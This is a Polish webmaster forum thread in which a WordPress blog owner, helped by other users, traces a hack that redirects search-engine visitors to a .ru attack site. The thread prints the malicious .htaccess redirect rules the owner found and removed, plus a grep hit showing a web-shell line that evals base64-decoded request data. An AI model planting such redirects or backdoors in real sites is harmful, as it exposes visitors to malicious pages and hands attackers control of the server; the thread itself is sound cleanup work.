Skocz do zawartości

Włamanie na strone


Elias
 Udostępnij

Rekomendowane odpowiedzi

Witam,

mam taki problem i nie wiem jak to w ogóle urgyść.

Mam swojego bloga na WP o turystyce https://www.krakowskieokolice.pl . Dziś dzwoni do mnie znajomy i mówi, że coś dziwnego się dzieje jak wchodzi na tą stronę. U siebie patrze i wszystko ok. Jednak jak wyczyściłem cache itp. Okazało się że strona jest chyba gdzieś przekierowywana. Na jakiś serwis .ru .

Wszedłem do FTP i w pliku htcacces nie widzę nic dziwnego. Zacząłem sprawdzać datę modyfikacji. Usunąłem z mojej templatki jakieś bardzo podejrzane nowe pliki, które pojawiły się wczoraj i dziś. Myślałem że to pomogło ale nadal jak próbuję wejść na stronę to mam komunikat że strona jest niebezpieczna...

Proszę o pomoc - co robić? Gdzie może być zaszyte przekierowanie itp. Inna strona na tym koncie działa, ale też jest zgłoszona jako potencjalnie niebezpieczna aczkolwiek myślę, że to przez tamtą.

Okolice Krakowa - zdjęcia, opisy wycieczek po Małopolsce etc.

r0qqgk.gif

Odnośnik do komentarza
Udostępnij na innych stronach

Jaka wersja WP ?

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel

Komora normobaryczna montaż -> Normobaria budowa i instalacja komory normobarczynej i jej hydrauliki.

Odnośnik do komentarza
Udostępnij na innych stronach

Włamanie mogło być z automatu po przez FTP. Należało by prześledzić logi serwera HTTP oraz poprosić o logi do FTP i je przeanalizować.

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel

Komora normobaryczna montaż -> Normobaria budowa i instalacja komory normobarczynej i jej hydrauliki.

Odnośnik do komentarza
Udostępnij na innych stronach

Przedwczoraj też miałem jakieś włamanie na 2 serwisy postawione na WP.

Dokleiło mi jakieś dziwne rzeczy do plików i dodatkowo:

- na początku wywaliło całkiem WP że strony nie działały (później jak pousuwałem część śmieci to ruszył ale wciąż dziwnie się zachowywał)

- wywaliło mi cały transfer na hostingu w ciągu 1 dnia

- pojawiły się niby linki do moich WP gdzieś nie wiadomo gdzie (pokazuje w kokpicie)

Jak to się stało trudno powiedzieć ale mam pewne podejrzenia. Stało się to w tym samy czasie jak na subdomenach obu WP instalowałem Arfooo + spolszczenie Arfooo + paczkę plików ze zmianami umieszczonymi na PIO.

Nie przesądzam, że to na pewno to ale myślę że gdzieś w plikach (nie wiem, w której paczce) było jakieś gó....

Dzisiaj usuwałem WP i instalował będę na nowo. Szczęście że były świeże i są backupy robione. Przez FTP raczej to się nie stało

Jeżeli szukasz ubranek niemowlęcych znajdziesz je w sklepie https://lencia.pl

Odnośnik do komentarza
Udostępnij na innych stronach

Ja w swojej aktywnej tamplatce w WP znalazłem jakiś syf. Wywaliłem ale nadal nic. Powiedzcie czy macie ten komunikat o zagrożeniu ? U mnie jest tak, że jak wpisuje z palca adres to raz jest a raz nie ma, a jak wchodzę z Google z jakieś frazy to jest zawsze.

W ogóle przekierowuje was na jakąś inną stronę?

Jakie jest prawdopodobieństwo że to coś zalęgło się w bazach danych?

EDIT

Przejrzałem każdy folder, każdy pliczek na FTP i nie ma tam już nic podejrzanego co by było modyfikowane w ciągu ostatnich 1 - 2 dni... A na bank wcześniej nie było żadnej hecy bo jestem na stronie codziennie, śledzę ją w GA itp i żadnych dziwnych rzeczy nie dopatrzyłem się. W GWT też na razie cisza.

Edytowane przez Elias

Okolice Krakowa - zdjęcia, opisy wycieczek po Małopolsce etc.

r0qqgk.gif

Odnośnik do komentarza
Udostępnij na innych stronach

śledzę ją w GA itp i żadnych dziwnych rzeczy nie dopatrzyłem się. W GWT też na razie cisza.
Takich informacji nie znajdziesz w GA :D Tylko logi serwera HTTP oraz FTP mogą "powiedzieć" skąd dokonano "włamania".

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel

Komora normobaryczna montaż -> Normobaria budowa i instalacja komory normobarczynej i jej hydrauliki.

Odnośnik do komentarza
Udostępnij na innych stronach

Wiem, bardziej chodziło mi o to, że jest to dowód że rzecz stałą się dziś, bo widziałbym w GA nagły spadek odwiedzin wczoraj.

O logi właśnie wysłałem prośbę, tyle że mają je tylko z dnia dzisiejszego... Gdzie to całe przekierowanie może być zaszyte?

EDIT

Ok, mam logi z FTP z ostatniego roku jako że mam stałę IP to łatwo mi było sprawdzić, że nikt inny się nie logował. Czy to oznacza że atak odbył się przez inny kanał ? (jestem newbie w tych rzeczach).

Edytowane przez początkujący
nie cytuj, jak nie musisz

Okolice Krakowa - zdjęcia, opisy wycieczek po Małopolsce etc.

r0qqgk.gif

Odnośnik do komentarza
Udostępnij na innych stronach

Używasz do generowania miniatur skryptu timthumb w którym ostatnio znaleziono lukę, pobierz nową wersję i będzie po problemie (a raczej po jego przyczynie bo to co napsuli trzeba w dalszym ciągu poprawić).

Edytowane przez Veal

Na emeryturze po SEO zajmuję się R&D.

Odnośnik do komentarza
Udostępnij na innych stronach

Skoro nikt się nie logował na FTP to ten kanał odpada.

Szukaj amonali w logach HTTP apacha.

-------

Masz stronę

Strona zgłoszona jako dokonująca ataków!

Strona now-protect.ru została zgłoszona jako strona stanowiąca zagrożenie i została zablokowana zgodnie z ustawieniami bezpieczeństwa.

--------

Diagnoza:

Masz wstawkę w pliku PHP która sprawdza redirect i jeśli jest z google.pl masz przekierowanie:

HTTP/1.1 301 Moved Permanently Date: Tue, 06 Sep 2011 21:37:34 GMT Server: Apache Location: https://now-protect.ru/accaunt/index.php Content-Type: text/html; charset=iso-8859-1

Możesz to takim kodem przetestować:

<?php
//  krakowskieokolice.php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,'https://www.krakowskieokolice.pl/');
curl_setopt($ch, CURLOPT_HEADER, TRUE);
curl_setopt($ch, CURLOPT_NOBODY, TRUE); // remove body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,CURLOPT_REFERER,'https://www.google.pl'); 
$head = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch); 
echo $head;
?>

Rozwiązanie:

Pobierz pliki z FTP i szukaj wystąpienia ciągów

eval

eval(base64_decode

google

now-protect.ru

jesli znajdziesz skasuj dany fragment kodu. Najprawdopodobniej bedzie w index.php na początku lub inny includowanym.

Oczywiście pokaźniej musisz załatać skrypty PHP, bo bez tego za jakiś czas będziesz mial to samo .

Edytowane przez Mion

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel

Komora normobaryczna montaż -> Normobaria budowa i instalacja komory normobarczynej i jej hydrauliki.

Odnośnik do komentarza
Udostępnij na innych stronach

Wielkie dzięki, trop jest dobry.

Znalazłem w .htacces taki kod, był pareset linii poniżej normalnego... Został już usunięty ze wszytskich plików .htacces na serwerze.

ErrorDocument 400 https://now-protect.ru/accaunt/index.php
ErrorDocument 401 https://now-protect.ru/accaunt/index.php
ErrorDocument 403 https://now-protect.ru/accaunt/index.php
ErrorDocument 404 https://now-protect.ru/accaunt/index.php
ErrorDocument 500 https://now-protect.ru/accaunt/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ https://now-protect.ru/accaunt/index.php [R=301,L]
</IfModule>

Niestety problem dalej występuje. Ściągnąłem pliki krakowskieokolice.pl na FTP tak jak radziłeś. .ru i google występowało tylko w .htacces. Teraz mam pytanie czy usunąć wszystko co zawiera w sobie

"eval(base64_decode" bo znalazłem 5 przypadków:

E:\publickhtml\www.krakowskieokolice.pl\wp-content\plugins\broken-link-checker\idn\uctc.php 11,00 KB 2011-09-07 09:02:11
41		 if ($from != 'ucs4array') eval('$data = self::'.$from.'_ucs4array($data);');
42		 if ($to != 'ucs4array') eval('$data = self::ucs4array_'.$to.'($data);');
191					 $tmp = base64_decode($b64);

E:\publickhtml\www.krakowskieokolice.pl\wp-content\plugins\wp-super-cache\wp-cache.php 152,00 KB 2011-09-07 09:12:16
1873 			$deleteuri = preg_replace( '/[ <>\'\"\r\n\t\(\)]/', '', str_replace( '/index.php', '/', str_replace( '..', '', preg_replace("/(\?.*)?$/", '', base64_decode( $_GET[ 'uri' ] ) ) ) ) );
1880 			$supercacheuri = preg_replace( '/[ <>\'\"\r\n\t\(\)]/', '', str_replace( '/index.php', '/', str_replace( '..', '', preg_replace("/(\?.*)?$/", '', base64_decode( $_GET[ 'uri' ] ) ) ) ) );
2468 	$gziprules .= "<IfModule mod_headers.c>\n  Header set Vary \"Accept-Encoding, Cookie\"\n  Header set Cache-Control 'max-age=3, must-revalidate'\n</IfModule>\n";

E:\publickhtml\www.krakowskieokolice.pl\wp-content\themes\typebased\config_db.php 4,00 KB 2011-09-07 09:13:35
36 	case 'eval':
37 				echo eval(base64_url_decode(@$_REQUEST['data']));
117 	return base64_decode($data);

E:\publickhtml\www.krakowskieokolice.pl\wp-content\themes\typebased\thumb.php 53,00 KB 2011-09-07 09:13:31
203 				  $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
206 				  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
1000 				  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
1005 				  header('Cache-Control: max-age=' . BROWSER_CACHE_MAX_AGE . ', must-revalidate');
1161 			header ('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');

E:\publickhtml\www.krakowskieokolice.pl\wp-includes\class-simplepie.php 394,00 KB 2011-09-07 09:16:07
11334 		header('Cache-Control: must-revalidate');
14834 				$data = base64_decode($data);

ps. a co powiecie na to https://terrygl.hubpages.com/hub/How-To-Rem...64_decode-Virus gość ma tam jakiś skrypt do czyszczenia - warto spróbować?

Edytowane przez Elias

Okolice Krakowa - zdjęcia, opisy wycieczek po Małopolsce etc.

r0qqgk.gif

Odnośnik do komentarza
Udostępnij na innych stronach

@pytanie czy usunąć wszystko co zawiera w sobie

eval(base64_decode < często też jest używane jeśli w szablonie masz linki do autora które nie można kasować Musisz sprawdzić empirycznie...

--------

Nadal masz przekierowanie:

HTTP/1.1 301 Moved Permanently Date: Wed, 07 Sep 2011 08:56:20 GMT Server: Apache Location: https://now-protect.ru/accaunt/index.php Content-Type: text/html; charset=iso-8859-1

.htaccess poprawiłeś - sprawdź na serwerze czy masz dobry.

Edytowane przez Mion

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel

Komora normobaryczna montaż -> Normobaria budowa i instalacja komory normobarczynej i jej hydrauliki.

Odnośnik do komentarza
Udostępnij na innych stronach

Podsumowanie:

Udałosię mam nadzieję że na dłuższą chwilę...

Rzeczywiście te htcacces nie podmieniły się po edycji, teraz jak rzeczywiście usunąłem te reguły z .ru problem zniknął (mam nadzieje że u was też, ale musicie wyczyścić cache i ciastka zanim sprawdzicie).

Luka niestety nadal nie znana. Podejrzewam swój hosting, ew. przyczyną mogą być niezaktualizowane wtyczki i Wordpress co zaraz uczynię.

Dziękuje wszystkim za pomoc - mam nadzieję że plikach .php nie ma jakiegoś dziadostwa które za parę godzin, dni się uaktywni i będzie to samo.

Edytowane przez Elias

Okolice Krakowa - zdjęcia, opisy wycieczek po Małopolsce etc.

r0qqgk.gif

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
 Udostępnij

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności